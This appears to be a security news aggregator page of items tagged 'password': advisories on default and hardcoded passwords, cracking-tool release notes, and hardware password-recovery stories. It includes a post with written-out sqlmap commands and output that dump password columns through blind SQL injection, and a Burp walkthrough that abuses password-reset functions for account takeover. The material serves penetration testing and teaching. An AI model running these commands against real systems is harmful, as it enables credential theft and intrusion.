«
Expand/Collapse
229 items tagged "password"
Related tags:
reset [+],
hacks [+],
hacking [+],
advisory [+],
router [+],
luseradd [+],
wire [+],
user [+],
cisco security advisory [+],
cisco security [+],
Tools [+],
2wire [+],
system [+],
ram disk [+],
openpgp key [+],
encrypted password [+],
email [+],
darknet [+],
Newbie [+],
BackTrack [+],
Area [+],
tar gz [+],
shellcode [+],
service vulnerability [+],
saved [+],
safer use [+],
remote [+],
passwords [+],
obfuscation [+],
mybb [+],
linux [+],
hash [+],
denial of service [+],
cms [+],
authentication [+],
Pentesting [+],
General [+],
vulnerability [+],
wrt [+],
wibiya [+],
video units [+],
username [+],
twitter [+],
text password [+],
text [+],
telnet server [+],
someone [+],
smartftp [+],
singtel [+],
setup wizard [+],
registrar software [+],
qualitynet [+],
proof [+],
pop3 authentication [+],
pop [+],
polycom [+],
phone [+],
pcwrunas [+],
pc welt [+],
pastebay [+],
password hashes [+],
passmanlite [+],
owncloud [+],
opendrive [+],
moroccotel [+],
master password [+],
linksys wrt54g [+],
linksys [+],
link dir [+],
kernel [+],
jd edwards [+],
ip phone [+],
installation [+],
hydra [+],
google [+],
gateway router [+],
g wireless [+],
ftp client [+],
forgery [+],
firmware [+],
django [+],
direct access [+],
design flaw [+],
database password [+],
d link [+],
credentials [+],
conduit [+],
cleartext [+],
cisco network registrar [+],
cisco network [+],
change admin password [+],
camera [+],
c series [+],
bypass [+],
brute forcer [+],
boxes [+],
belkin [+],
authentication system [+],
arbitrary users [+],
application configuration [+],
administrative password [+],
admin password [+],
account [+],
access [+],
john [+],
your [+],
wpa wpa2 [+],
wordlists [+],
wordlist [+],
word list [+],
wep [+],
webapps [+],
vnc [+],
timeclock software [+],
tgz [+],
tar [+],
statistical database [+],
sql injection [+],
small linux [+],
singapore [+],
script [+],
routers [+],
root [+],
recovery [+],
read admin [+],
permutations [+],
perl script [+],
password combination [+],
pack [+],
oracle [+],
ophcrack [+],
open source [+],
online [+],
null [+],
network hack [+],
network administrators [+],
netkeys [+],
mysql [+],
mike [+],
memory trade [+],
manager [+],
list [+],
laptop [+],
key generator [+],
keepass [+],
issue [+],
intel machines [+],
information disclosure [+],
hotmail [+],
hijacking [+],
gpu [+],
generation [+],
feture [+],
employee timeclock [+],
email password [+],
efipw [+],
drive [+],
dongle [+],
dictionary word [+],
day [+],
cve [+],
csrf [+],
cracker [+],
bruteforce password [+],
blueberry [+],
bios [+],
attacker [+],
apple efi [+],
analysis stage [+],
analysis [+],
aircrack [+],
administration service [+],
admin [+],
Wireless [+],
Support [+],
Discussion [+],
unix passwords [+],
unix [+],
ripper [+],
password cracker [+],
flavors [+],
year [+],
xampp [+],
wsc [+],
wpa [+],
workstation [+],
wordlist generator [+],
winrar password [+],
winrar [+],
windows password cracker [+],
windows machine [+],
western digital [+],
way [+],
washington monument [+],
washington [+],
vulnerabilities [+],
vnc server [+],
virtual drives [+],
vijay [+],
videoconferencing [+],
vbulletin [+],
validation [+],
usernames [+],
usb memory stick [+],
usb device [+],
usb [+],
unauthorized [+],
txt [+],
tutorial [+],
troubles [+],
triggers [+],
tracker [+],
toshiba laptops [+],
torrent file [+],
toor [+],
tinypug [+],
three times [+],
this [+],
thinkpad [+],
thc hydra [+],
thanks in advance [+],
tcexam [+],
swedish [+],
stop hackers [+],
stop [+],
stealing [+],
ssd [+],
sqlmap [+],
sql [+],
sophos [+],
somebody [+],
solid state disk [+],
solaris [+],
snuffs [+],
smf [+],
site [+],
sheer number [+],
sha [+],
session cookie [+],
session [+],
server side applications [+],
security vulnerability [+],
security toolkit [+],
security study [+],
security issue [+],
secure [+],
secunia [+],
scanner [+],
scandal [+],
salve [+],
s 700 [+],
rxs [+],
rsmangler [+],
router password [+],
root password [+],
roomwizard [+],
reset request [+],
research students [+],
request tracker [+],
request [+],
remote exploit [+],
redaxscript [+],
random numbers [+],
random number generation [+],
rainbow [+],
quot [+],
pypam [+],
protection law [+],
protection [+],
proper noun [+],
program [+],
processing [+],
prewikka [+],
power [+],
post [+],
porta 80 [+],
popular [+],
plugs [+],
plug ins [+],
phpvidz [+],
php [+],
phishing [+],
penetration [+],
pdf password cracker [+],
pdf [+],
pcs [+],
patches [+],
password thanks [+],
password resets [+],
password reset [+],
password protection [+],
password managers [+],
password manager [+],
password lists [+],
password keeper [+],
password field [+],
password column [+],
password bug [+],
password authentication [+],
passphrase [+],
pam [+],
owa [+],
nvidia 9800gtx [+],
null byte [+],
ntds [+],
nokia [+],
network penetration [+],
network [+],
need [+],
mysqlpasswordauditor [+],
mysql password [+],
mypath [+],
mydatabase [+],
msf [+],
mozilla firefox [+],
mozilla [+],
mobile security [+],
military [+],
microcontrollers [+],
metasploit [+],
member password [+],
member [+],
media [+],
md5 hash [+],
matching [+],
martin [+],
management [+],
mail headers [+],
machine [+],
lst [+],
login cracker [+],
login [+],
lock [+],
lm hash [+],
line [+],
limiting factor [+],
lastpass [+],
laptops [+],
laptop case [+],
keyboard [+],
keeper [+],
kde [+],
just [+],
jdedwards [+],
iphone [+],
interface [+],
information disclosure vulnerability [+],
includes [+],
http 192 168 1 1 [+],
html url [+],
htc [+],
hashes [+],
hard disk [+],
hard [+],
handshake [+],
hack [+],
graphics processing unit [+],
graphical user interface [+],
glsa [+],
gia [+],
georgia tech [+],
generator [+],
gawker [+],
foursquare [+],
for [+],
flaw [+],
firefox [+],
fingerprint scanner [+],
file password [+],
file [+],
field [+],
facebook [+],
f king [+],
exploitation [+],
esoftpro [+],
e mail addresses [+],
drupal [+],
dowgroup [+],
domain controller [+],
dogbert [+],
dit [+],
directory domain [+],
digit password [+],
digit [+],
dictionary attack [+],
decrypt [+],
dbo [+],
dave ferguson [+],
database [+],
darkmysqli [+],
dafftin [+],
d mydatabase [+],
custom word [+],
cupp [+],
cuda [+],
ctf [+],
crunch crunch [+],
crunch [+],
cross site scripting [+],
cross [+],
cracking passwords [+],
cracking password [+],
cracking [+],
correct password [+],
coreftp [+],
consumer concern [+],
congress [+],
column [+],
code [+],
cms password [+],
cloud [+],
clock time [+],
cktricky [+],
cisco unified [+],
cisco secure [+],
cisco patches [+],
cisco [+],
chrome [+],
chntpw [+],
change [+],
cfdisk [+],
cent [+],
c logonid [+],
byword [+],
bssid [+],
bruteforcer [+],
bruteforce attack [+],
broken [+],
book [+],
body [+],
board search [+],
bios passwords [+],
bind [+],
becomes [+],
beaglebone [+],
bcc mail [+],
automated [+],
auditing software [+],
attiny [+],
assistance [+],
arm processor [+],
android [+],
and [+],
amazon [+],
adrian [+],
administrative [+],
adan [+],
adam [+],
acs [+],
account takeover [+],
access control system [+],
access control [+],
abusing [+],
abram [+],
abraham [+],
abel [+],
abdullah [+],
Supporto [+],
Software [+],
Idiots [+],
Howto [+],
Fixes [+],
ExploitsVulnerabilities [+],
Corner [+],
Bugs [+],
disclosure [+],
security [+],
password disclosure [+],
default [+],
server [+],
read [+]
-
-
14:46
»
Packet Storm Security Exploits
The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. pcwRunAs versions 0.4 and below are affected.
-
14:46
»
Packet Storm Security Recent Files
The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. pcwRunAs versions 0.4 and below are affected.
-
14:46
»
Packet Storm Security Misc. Files
The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. pcwRunAs versions 0.4 and below are affected.
-
14:30
»
Hack a Day
The biggest benefit to using the BeagleBone is it’s 700 MHz ARM processor. If you’re just messing around with basic I/O that power is going unused, but [Nuno Alves] is taking advantage of its power. He built a PDF password cracker based on the $85 development board. We recently saw how easy it is to [...]
-
-
7:01
»
Hack a Day
Like many businesses out there, [Joonas Pihlajamaa’s] employer requires him to change his password every few months. Instead of coming up with a complex, yet easy to remember password again and again, he built a small USB device to do the work for him. He dismantled an old USB memory stick, fitting it with an [...]
-
-
20:14
»
Packet Storm Security Advisories
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users.
-
20:14
»
Packet Storm Security Recent Files
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users.
-
20:14
»
Packet Storm Security Misc. Files
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users.
-
-
16:57
»
Packet Storm Security Recent Files
A small application built to test the performance of a pop3 authentication system using a lot of concurrent connections. It can also be used to try lots of password against a pop3 server. It is capable of using up to 1024 sessions (or more using multiple processes). However with this amount it is capable of reducing internet connections to a crawl and also greatly increasing the load on the server.
-
16:57
»
Packet Storm Security Tools
A small application built to test the performance of a pop3 authentication system using a lot of concurrent connections. It can also be used to try lots of password against a pop3 server. It is capable of using up to 1024 sessions (or more using multiple processes). However with this amount it is capable of reducing internet connections to a crawl and also greatly increasing the load on the server.
-
16:57
»
Packet Storm Security Misc. Files
A small application built to test the performance of a pop3 authentication system using a lot of concurrent connections. It can also be used to try lots of password against a pop3 server. It is capable of using up to 1024 sessions (or more using multiple processes). However with this amount it is capable of reducing internet connections to a crawl and also greatly increasing the load on the server.
-
-
18:25
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
18:25
»
Packet Storm Security Tools
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
18:25
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
7:17
»
Carnal0wnage
So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.
To search all databases for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'
To search a specific database for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'
**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**
[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'
You'll get asked:
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
You'll want to give it a 1 first time around, it will probably give you stuff like this:
[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords
We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1
You could also just do a dump if you want to start grabbing data
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1
If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <--sometimes works, sometimes doesnt. Not sure whats up with that.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
If you just want to just pull out certain columns you can do something like this (assuming columns LogonId and Password):
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)
-CG
-
-
8:15
»
Packet Storm Security Recent Files
This is a perl script that generates a list of passwords from user-supplied input on the command line. It enables a tester the ability to create various permutations of a given password for testing.
-
8:15
»
Packet Storm Security Misc. Files
This is a perl script that generates a list of passwords from user-supplied input on the command line. It enables a tester the ability to create various permutations of a given password for testing.
-
-
10:09
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
10:09
»
Packet Storm Security Tools
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
10:09
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
18:42
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
16:56
»
Packet Storm Security Exploits
The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.
-
16:56
»
Packet Storm Security Recent Files
The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.
-
16:56
»
Packet Storm Security Misc. Files
The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.
-
-
9:44
»
Packet Storm Security Recent Files
This article will show how to use Hydra to check for weak passwords. Hydra tries all possible password combination against a server on the Internet until one valid one is found to log in to the server. It is a powerful tool for hackers and network administrators alike.
-
9:44
»
Packet Storm Security Misc. Files
This article will show how to use Hydra to check for weak passwords. Hydra tries all possible password combination against a server on the Internet until one valid one is found to log in to the server. It is a powerful tool for hackers and network administrators alike.
-
-
22:56
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
22:56
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
15:00
»
Sophos security news
Sophos launches free mobile security toolkit as survey reveals lack of consumer concern regarding security issues on mobile devices
-
-
17:04
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
17:04
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
8:32
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
8:32
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
5:04
»
Carnal0wnage
Dave Ferguson has beaten up on forgotten/reset password functionality for some time and recently participated in an OWASP podcast where he discussed these problems. The podcast reminded me of some techniques I've used in the past which have been successful and may be worth sharing. Accessing other user's accounts with insecurely coded forgot/reset password functionality is more common than you might think.
This posts focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgot password hundreds of times and parsing thru all of the e-mails we receive. Thanks to the recently added macro support now available in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.
For those not familiar with BurpSuite's Macro support, lets walk thru this.
So here is a picture of the email reset we've been sent:
To initiate a password reset request it is a four part request & response pair sequence. This sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.
Take a look at the screenshot below:
Okay now we need to configure each individual request/response to extract data we want. We have to grab a JSESSIONID and a struts token. Lets highlight the first request/response and configure.
Example of configuring one of the items
You'll notice that for the first request I've chosen to not use cookies in the cookie jar. This is because I want to start the sequence clean and without a cookie.
Notice the struts.token.name and struts.token are dynamic and changing so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One thing that is important to notice is that I've decided to uncheck URL encode for the email portion. It is already URL encoded so no need. Otherwise it will cause problems.
Name the Macro
The next piece requires you to add the macro to a session rule. Again Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.
Next, you'll need to add the pages to scope:
Now send the original, first request (I do this at the proxy history portion of Burp) over to intruder, select null payloads and set it for a number that is large enough to collect a big portion of passwords so we can review entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.
Next we need to retrieve the emails from gmail and review them for entropy. Here is a script I've written to retrieve emails from gmail, parse for the password values and write to a file called tokens.txt:
Lines 11-17: Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize Pop class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop obj
Lines 20-27: Line 21-22: If we no emails, print that fact out to the screen
Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.
Lines 31-36: Line 31: Iterate thru pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method
Lines 40-53: Line 41: Create a new_file object which is a file called tokens.txt
Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12
Line 43: Begin reading each line from the read_file
Lines 44-46: If the line matches the "password: somepassword" write it to a file.
Line 53: Kick the whole thing off
Review the tokens.txt file
 |
| We can see that the new passwords sent aren't very random. We can load this in burp sequencer but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this and yes this is a real-life example that I've come across: |
Factors that could slow us down:
1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and and the site tells you it doesn't exist. Now we know who
DOES exist on the system.
2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).
3) After we've reset other user's passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small amount of incorrect password submissions) the account may be locked out leaving us without access. That is no fun.
Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.
Here is an example of loading the tokens file in sequencer:
Summary:
We've bypassed struts token and multi-flow password resets which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've manually (in this case) reviewed the entropy but we can also do this with sequencer. Now we have a way to guess passwords more efficiently and in combination with other flaws leaves us just a short period of time from compromising accounts.
~cktricky
-
-
11:51
»
Packet Storm Security Exploits
This Metasploit module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenticated and doesn't remove or block after first access.
-
11:51
»
Packet Storm Security Recent Files
This Metasploit module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenticated and doesn't remove or block after first access.
-
11:51
»
Packet Storm Security Misc. Files
This Metasploit module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenticated and doesn't remove or block after first access.
-
-
2:05
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
2:05
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
8:46
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
8:46
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
13:22
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
13:22
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
11:48
»
Packet Storm Security Advisories
Cisco Security Advisory - Cisco Network Registrar Software Releases prior to 7.2 contain a default password for the administrative account. During the initial installation, users are not forced to change this password, allowing it to persist after the installation. An attacker who is aware of this vulnerability could authenticate with administrative privileges and arbitrarily change the configuration of Cisco Network Registrar.
-
11:48
»
Packet Storm Security Recent Files
Cisco Security Advisory - Cisco Network Registrar Software Releases prior to 7.2 contain a default password for the administrative account. During the initial installation, users are not forced to change this password, allowing it to persist after the installation. An attacker who is aware of this vulnerability could authenticate with administrative privileges and arbitrarily change the configuration of Cisco Network Registrar.
-
11:48
»
Packet Storm Security Misc. Files
Cisco Security Advisory - Cisco Network Registrar Software Releases prior to 7.2 contain a default password for the administrative account. During the initial installation, users are not forced to change this password, allowing it to persist after the installation. An attacker who is aware of this vulnerability could authenticate with administrative privileges and arbitrarily change the configuration of Cisco Network Registrar.
-
10:01
»
Hack a Day
The power that a Graphics Processing Unit presents can be harnessed to do some dirty work when trying to crack passwords. [Vijay] took a look at some of the options out there for cracking passwords and found that utilizing the GPU produces the correct password in a fraction of the time. On a Windows machine [...]
-
-
23:09
»
SecuriTeam
Cisco Secure ACS contains an Unauthorized Password Change Vulnerability.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
20:51
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
20:51
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
20:38
»
Packet Storm Security Recent Files
PACK (Password Analysis and Cracking Kit) is a toolkit that allows researchers to optimize their password cracking tasks, analyze previously cracked passwords, and implements a novel attack on corporate passwords using minimum password policy. The goal of this toolkit is to assist in automatic preparation for the "better than bruteforce" password attacks by analyzing common ways that people create passwords. After the analysis stage, the statistical database can be used to generate attack masks for common tools such as Hashcat, oclHashcat, and others.
-
20:38
»
Packet Storm Security Misc. Files
PACK (Password Analysis and Cracking Kit) is a toolkit that allows researchers to optimize their password cracking tasks, analyze previously cracked passwords, and implements a novel attack on corporate passwords using minimum password policy. The goal of this toolkit is to assist in automatic preparation for the "better than bruteforce" password attacks by analyzing common ways that people create passwords. After the analysis stage, the statistical database can be used to generate attack masks for common tools such as Hashcat, oclHashcat, and others.
-
6:04
»
Hack a Day
shackspace member [@dop3j0e] found himself in a real bind when trying to recover some data after his ThinkPad’s fingerprint scanner died. You see, he stored his hard drive password in the scanner, and over time completely forgot what it was. Once the scanner stopped working, he had no way to get at his data. He [...]
-
-
12:02
»
Hack a Day
In his line of work, Instructables user [Harrymatic] sees a lot of Toshiba laptops come across his desk, some of which are protected with a BIOS password. Typically, in order to make it past the BIOS lockout and get access to the computer, he would have to open the laptop case and short the CMOS [...]
-
-
15:00
»
Hack a Day
Here’s a guide for recovering protection passwords from ATA hard drives (translated). These passwords are stored in a special area of the hard disk that also contains the firmware for the device. Normally you can’t get at them but [Supersonic] walks us through a method used to grab the data off of a Western Digital [...]
-
-
11:22
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
11:22
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
20:49
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
20:49
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
23:24
»
Packet Storm Security Advisories
Cisco Security Advisory - Tandberg C Series Endpoints and E/EX Personal Video units that are running software versions prior to TC4.0.0 ship with a root administrator account that is enabled by default with no password. An attacker could use this account in order to modify the application configuration or operating system settings. Resolving this default password issue does not require a software upgrade and can be changed or disabled by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to disable the root account or change the password.
-
23:24
»
Packet Storm Security Recent Files
Cisco Security Advisory - Tandberg C Series Endpoints and E/EX Personal Video units that are running software versions prior to TC4.0.0 ship with a root administrator account that is enabled by default with no password. An attacker could use this account in order to modify the application configuration or operating system settings. Resolving this default password issue does not require a software upgrade and can be changed or disabled by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to disable the root account or change the password.
-
23:24
»
Packet Storm Security Misc. Files
Cisco Security Advisory - Tandberg C Series Endpoints and E/EX Personal Video units that are running software versions prior to TC4.0.0 ship with a root administrator account that is enabled by default with no password. An attacker could use this account in order to modify the application configuration or operating system settings. Resolving this default password issue does not require a software upgrade and can be changed or disabled by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to disable the root account or change the password.
-
-
12:24
»
Carnal0wnage
You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.
This is awesome because before that I had to use Immunity's
VAAseline to do VNC bruteforcing. But now you can just use vnc_login.
So the scenario is you find yourself on the other end of a VNC server.
Its tedious to password guess like this
Instead let's use the metasploit module
and throw a dictionary attack against the VNC server
Looks like the VNC no auth module had been ported and stuck in there too :-)
-CG
-
-
5:39
»
Sophos security news
Always choose a hard-to-guess non-dictionary word as your Twitter password, and never use the same password on multiple websites.
-
-
15:43
»
remote-exploit & backtrack
